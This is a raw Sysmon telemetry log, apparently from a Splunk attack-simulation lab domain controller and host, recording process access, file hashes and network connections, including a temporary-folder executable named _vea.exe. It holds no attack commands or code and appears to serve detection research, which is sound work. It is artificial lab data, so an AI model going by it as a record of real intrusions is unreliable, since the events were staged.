11:10:03.901{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296157Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:10:03.901{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296156Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:10:03.901{C8EA50B7-F11C-6215-0500-000000003802}412428C:\Windows\system32\csrss.exe{C8EA50B7-160B-6216-E806-000000003802}3164C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000296155Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:10:03.901{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-160B-6216-E806-000000003802}3164C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000296154Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:10:03.904{C8EA50B7-160B-6216-E806-000000003802}3164C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000220247Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:10:04.804{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=82176D619E9DE5E3C2FB19559E11935B,SHA256=F0E639BC6632E53C6F1C47231508685F380DEFCAF8319C395146839A32F9F6E9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000296162Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:10:04.048{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3068EAF53C79E87293C967A577F687CC,SHA256=FE2733BA1DD57E446309A4463A4ED3834BF1F021AA7EE4CF5C03A1FCEF5A72F3,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000220246Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:10:01.691{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51568-false10.0.1.12-8000- 23542300x8000000000000000220248Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:10:05.850{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5A8EAC33D3F45F39827C18CD8BFA0590,SHA256=271DBC9A3F14F882B0ED4CB419983926088368B05EFEA6F63073B9F05093A19A,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000296165Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:10:03.392{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local49315-true0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local389ldap 354300x8000000000000000296164Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:10:03.391{C8EA50B7-F130-6215-2C00-000000003802}2420C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local49315-true0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local389ldap 23542300x8000000000000000296163Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:10:05.070{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=35CCB0448AC689DD985C089CC1EFB187,SHA256=D6F164144C554F07E05D364D942FAAEE1E8D029051585AD34210F37E1204818A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220249Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:10:06.866{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=59364CA3BC7F00E44C5F3854A7A302C4,SHA256=C09F56B08FEB9BD8A5175E07B0A5AC62F79B8FEAA89E2CAAE215476FAC4A7602,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000296167Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:10:03.621{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49316-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000296166Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:10:06.086{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3801730C4924AB5CB1F379BB491B0F0C,SHA256=6568D5EB5790747C3B5ECFEAB1B42B9E4870F19213BAD3743BDD96C68BAB8514,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220250Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:10:07.897{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=993B18778F1034CC12792C3DB2AE006D,SHA256=6B1C105BD188FDF9DBE64DEE4A169B6ED4EB281AC99B414387C4CC03083C1FA0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000296168Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:10:07.153{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A909419FD4C24BEB0F0F3B7365E0895F,SHA256=39E4798CE64DADD8A553109B0FC127E3C43B92B988B5AA3E95BF9AC199F992C6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220251Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:10:08.944{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8575A36D6211506B0B28D6623EC2AFA8,SHA256=56CDA7F002487A29FF665F2554CE049E646759D3848E7F67D30CD7EED6C22FCD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000296169Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:10:08.186{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=351251BFFF830CBEED1A0EF99B55D7D3,SHA256=F3881213FE25F0EB61EFB3DE0A4BFACEBF9BCCAAEADFD1C452CBE5A0829791B1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220253Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:10:09.991{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F6361DACD35CF12AA5FD403BC95562BE,SHA256=C0FBD1402E0D78CE9704BBAC39F5736E69836C40565A6025C3D79CB0D325EFD2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000296170Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:10:09.201{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8A44BE3D6E3761BC9F68109CFA15F842,SHA256=A5628B049E2570515808235B11209400ECE71FE07E6E5CC6B2EC084F2F4EE7C9,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000220252Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:10:07.503{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51569-false10.0.1.12-8000- 23542300x8000000000000000296171Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:10:10.216{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3568420FEAC8D094E736A0C6B63A05FE,SHA256=63D9B91DA0FC798298543B0BBEE3AC9B65E3C53DFD8332F00B8D9EE498571231,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220254Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:10:11.007{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=255C7693899F3A63DBF1B7F946611DE1,SHA256=F651F693762D1E4524A11316A28F209071C5CEDB4BC67F8C830F487C9D8250FD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000296172Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:10:11.231{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7A95FF258E9178102F83DDEA62653159,SHA256=3D6138FFEC1035D54DF32B1A014C57D11730059178922EE1D080BDF94DF4533F,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000296174Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:10:09.542{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49317-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000296173Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:10:12.231{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D8EE4187AA809AEF4D144253F20CAE76,SHA256=4DC2C88CB1A3F73F3BA0B3CBE102D6E9C7AD382E3090DF66F7E7A5C3A46B532F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220255Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:10:12.022{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=513256F2128A1AFBEF065E30D1ACC547,SHA256=C1D9537AE14258D8C05D697C2CC2DC4F59900570C15CE05CEAEF703477629CF2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000296175Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:10:13.249{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D1806675C38859116B74D5820F04F27B,SHA256=5F573E1AA6034709F69F403B05B2A380D0FB3ABD29E308A66300B7D05441E984,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220256Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:10:13.038{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0FA9AE83DF019EFA3E8DA6011DE3E409,SHA256=B20A1B61C48ECB952F55CAB13D1E9C0E33E5B0EAE6F04E790E56F37F8E0E3F51,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000296176Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:10:14.267{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=47CE3F2BD7CDD40288803C6AE7F83D84,SHA256=577CC13BBEDF398E155BA40BBC81304C360B3946A1F0D025CD872D2BD03C7C52,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220257Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:10:14.038{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=02E54F6CE7D9F5802EBFCB6C4680CA4B,SHA256=8923AA9FAF1B9A7FA15A986BBE13A4FABD131045306DCE59076D013C67BCE308,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000220259Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:10:13.503{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51570-false10.0.1.12-8000- 23542300x8000000000000000220258Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:10:15.100{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7FCB68AD738A04DAEDE145DDF736B0D1,SHA256=20427CB54AD3BFC7265054E01D9804965AA6F524CA33A2D8E9691AB35126D6E8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000296177Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:10:15.297{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=67E22DADE895291D7BEA02EA6BC9DE0D,SHA256=EC9CD2AAA23639AD3DA6BB7821732260105844250A97C30700C5610CAF917CA8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220260Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:10:16.147{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=441A7BB52AE670EE13365652C314CCE8,SHA256=E2B7C914167F83853461FD82AEC14E951DA4FD095436CD4DF493085F60FBFF22,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000296192Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:10:16.911{C8EA50B7-F11F-6215-1000-000000003802}364764C:\Windows\system32\svchost.exe{C8EA50B7-1618-6216-EA06-000000003802}5124C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296191Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:10:16.911{C8EA50B7-F11F-6215-1000-000000003802}3641376C:\Windows\system32\svchost.exe{C8EA50B7-1618-6216-EA06-000000003802}5124C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296190Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:10:16.880{C8EA50B7-1618-6216-EA06-000000003802}51244420C:\Windows\system32\conhost.exe{C8EA50B7-1618-6216-E906-000000003802}6012C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296189Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:10:16.827{C8EA50B7-F2AA-6215-B100-000000003802}22444896C:\Windows\system32\csrss.exe{C8EA50B7-1618-6216-EA06-000000003802}5124C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000296188Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:10:16.811{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-1618-6216-EA06-000000003802}5124C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296187Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:10:16.680{C8EA50B7-F2AA-6215-B100-000000003802}22442592C:\Windows\system32\csrss.exe{C8EA50B7-1618-6216-E906-000000003802}6012C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000296186Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:10:16.680{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296185Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:10:16.680{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296184Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 